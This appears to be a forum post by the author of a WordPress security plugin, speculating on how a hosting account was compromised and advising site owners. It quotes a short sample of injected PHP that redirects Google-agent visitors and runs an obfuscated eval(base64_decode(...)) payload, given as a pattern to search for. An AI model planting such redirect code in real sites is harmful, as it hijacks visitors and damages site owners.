Unless these spammers have figured out a way to beat WordPress’s nonces they didn’t use the AskApache Password Protection Plugin to do it. And as the author of that plugin, I know these exploits very well indeed, having studied hundreds and thousands of them on honeypots and in server logs which is how I came up with the anti-hacking htaccess rules that supplement the authentication aspect.
From what I’ve been able to gather, the exploit most likely occured from an insecure WordPress plugin, an insecure CMS (joomla,xoops,etc.), that you had, or from someone stealing your ftp login info, which shouldnt happen because DH supplies encrypted transports (sftp, ssh, etc.)… all it takes is one unencrypted mistake, or just downloading 1 trojan or being infected by 1 malicious website with a 0 day on it.
Here’s some example ‘exploit’ code…
$agent = $_SERVER['HTTP_USER_AGENT'];
if (eregi("google", $agent)) {header("HTTP/1.1 301");
header("Location: http://ba");
exit(); }
eval(base64_decode('naSgiZ29vKCJIVFRQLzEuMSAzMDEiKTtoZWFkZXIoIkxvY2F0aW9
uOiBodHRwOi8vYmFibG8ubWUudWsvIik7ZXhpdCgpO30=’));
So search your site files for ‘base64_decode’, ‘eval’, ‘header’, ‘301’, etc…
I agree that compromised FTP accounts are the most likely culprit. Although it is possible that someone has written code that is able to bypass a webhosting companies internal security to reach the stored passwords, its unlikely because they would eventually go out of business if they were that awful.
Many webhosting companies use those easy webftp type scripts and use them in their cpanels and various user-login areas, these scripts often verify the username and password by checking a database, usually MySQL. So that is more likely that an AI-trojan running around undetected. Access to a a MySQL database of passwords would only be noticed if they were actively checking for that.
Otherwise the loss of the ftp account info could happen anywhere upstream of your connection if you are not using sftp. My guess is they have access to a webhosting companies MySQL database, maybe they got lucky with their greeting card trojans and got a staff members computer infected and found it that way. Once they have ftp access to your account they can find other passwords and usernames you are associated with by looking at your config files, thats where it can start to be more AI… they seem pretty dumb though, so I doubt it.
All you can do if you are in this position is continually bug your hosting support until they fix it. A crime is being committed and they do have certain legal obligations to at least try and prevent this from happening.
Even the .htaccess security trick I outlined here won’t work if your host is to blame… but DH is for the most part still linux people, and they know their stuff.
_____
[color=#00CC00] _ _| _ _ _ _|_ _
(_|_\|<(_||_)(_|(_| |(/_
|
[/color] :~
